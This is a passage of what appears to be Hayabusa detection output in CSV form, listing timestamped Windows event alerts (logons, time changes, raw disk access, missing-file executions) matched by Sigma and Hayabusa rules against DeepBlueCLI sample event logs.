LogonID: 0xd99e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:36.944 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 07:05:36.944 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 07:05:36.944 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:40.928 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: 
localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:40.928 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:40.928 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:08:00.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 07:08:00.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 07:10:10.631 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 08:11:15.779 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 08:11:15.779 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 08:11:15.779 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:29:47.424 
+09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:29:47.517 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:30:12.392 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:30:12.392 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:32:12.657 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:34:00.063 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:40:48.532 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0xd9c6,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:42:11.390 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:42:11.390 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:42:34.625 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:42:43.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-22 08:42:49.610 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 
08:42:49.610 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:42:49.610 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:43:06.625 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x16559 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x16589 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:43:06.625 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x16559,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:44:23.818 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:44:23.818 +09:00,IE8Win7,1,high,Execution Of Other File Type 
Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:44:23.849 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:45:01.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-22 08:45:01.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-22 09:44:32.677 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x16589,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:07:11.015 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:07:11.015 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:07:26.562 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:07:38.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-24 14:07:42.189 +09:00,IE8Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:07:42.189 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:07:42.189 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:08:08.126 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b7c0 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b7f0 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:08:08.126 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x2b7c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:09:50.000 +09:00,IE8Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-24 14:09:50.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-24 14:11:00.564 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-24 14:11:00.564 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:18:43.547 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:18:43.547 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:18:43.562 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 02:25:02.877 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:25:02.877 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:25:02.877 +09:00,IE8Win7,4616,medium,Unauthorized System Time 
Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 02:48:26.739 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:48:26.739 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:48:26.739 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 02:57:33.848 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:57:33.848 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 02:57:33.848 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 03:01:39.454 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 03:01:39.454 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 03:01:39.454 +09:00,IE8Win7,4616,medium,Unauthorized System Time 
Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 03:02:36.847 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 03:02:36.847 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 03:02:36.847 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 03:05:21.128 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 03:05:40.910 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 03:08:12.894 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:49:55.313 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:49:55.313 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 
06:49:55.313 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:50:49.109 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2b7f0,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:52:22.343 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:52:22.343 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:52:36.312 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:52:41.000 +09:00,IE8WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 06:52:48.955 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:52:48.955 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:52:48.955 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:54:52.158 
+09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xcf564 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xcf598 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:54:52.158 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0xcf564,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:55:06.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 06:55:06.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 06:57:07.814 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:23:56.107 +09:00,IE8Win7,1,high,Execution 
Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:23:56.107 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:23:56.575 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:26:20.278 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:35:01.091 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0xcf598,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:14.156 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:38:14.156 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:38:20.765 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:22.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public 
IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 07:38:26.183 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:38:26.183 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:38:26.183 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:48.104 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27008 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27038 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:48.104 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 
0x27008,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:40:33.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 07:40:33.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 07:48:51.643 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x27038,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:50:56.046 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:50:56.046 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:51:16.890 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:22.000 +09:00,IE9WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 07:51:29.601 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:51:29.601 +09:00,IE9Win7,1,high,Execution Of Other File Type Than 
